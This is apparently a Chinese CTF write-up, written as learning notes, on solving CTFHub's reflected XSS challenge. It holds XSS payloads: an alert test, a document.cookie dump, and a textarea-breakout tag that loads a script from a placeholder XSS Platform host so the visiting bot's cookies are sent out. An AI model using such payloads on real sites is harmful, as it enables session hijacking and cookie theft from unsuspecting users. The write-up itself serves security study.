0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习，实训平台。提供优质的赛事及学习服务，拥有完善的题目环境及配套 writeup ，降低 CTF 学习入门门槛，快速帮助选手成长，跟随主流比赛潮流。

        

        

0x01 题目描述

反射型：

        （无）

        

        

0x02 解题过程

Ⅰ检查网页显示内容发现有一个输入框以及一个提交表单。可以在这个输入框中输入你的名字并提交。第二个输入框是发送构造好的 XSS 链接给机器人模拟执行。一般情况下，在一个网页中有一个输入框并且带有一个提交表单的，就有可能含有 XSS 漏洞。

        

Ⅱ直接使用 scripts 标签写入一个警告弹窗，警告内容自定义。

<script>alert("flag")</script>

        

Ⅲ点击提交表单按钮，发现成功跳出警告弹窗，说明此题存在 XSS 漏洞。

        

Ⅳ验证存在 XSS 漏洞后，使用 document.cookie 语句在弹窗和控制台中输出当前网页包含的所有 cookie 。

<script>alert(document.cookie);console.log(document.cookie);</script>

        

Ⅴ点击提交后，弹窗显示为空。检查网页源代码发现 script 标签被正常执行到 html 页面中。

<div>
    <h1>Hello, <script>alert(document.cookie);console.log(document.cookie);</script>
    </h1>
</div>

        

Ⅵ 这说明 XSS 攻击通常需要使用一个服务器去接收参数，那么这里使用 XSS Platform 平台来接收。根据提示，将第一行代码植入到怀疑出现 xss 的地方（注意'的转义）。

</textarea>'"><script src=http://xxx.xxx.xxx.xxx/Q7yYOv?1702702862></script>

关于 XSS Platform 平台搭建的方法： 保姆级 | XSS Platform环境搭建-CSDN博客

         

Ⅶ在第一行输入框中使用 XSS Platform 平台中的代码，先执行 XSS 漏洞攻击。

        

Ⅷ第二个输入框则是用了模拟目标网站用户模拟点击受污染的 URL 链接，如果点击了这个链接，那么刚刚注入的 XSS 代码将会被执行并传递到本地服务器中。

        

Ⅸ访问 XSS Platform 平台，检查 cookie 参数是否传递到本地服务器中。检查发现此题 flag 。

        

        

0x03 XSS反射型

        

        XSS反射型攻击一般伪装成合法的 URL 链接诱导用户点击。点击后，这个网页的 XSS 漏洞将会被执行，而恶意代码将会在用户的浏览器中执行，并返回参数给攻击者的服务器。关于 XSS 反射型攻击也类似于钓鱼攻击，因为攻击者一般会伪装成可信的实体来欺骗用户。

        

        

0x04 总结

文章内容为学习记录的笔记，由于作者水平有限，文中若有错误与不足欢迎留言，便于及时更正。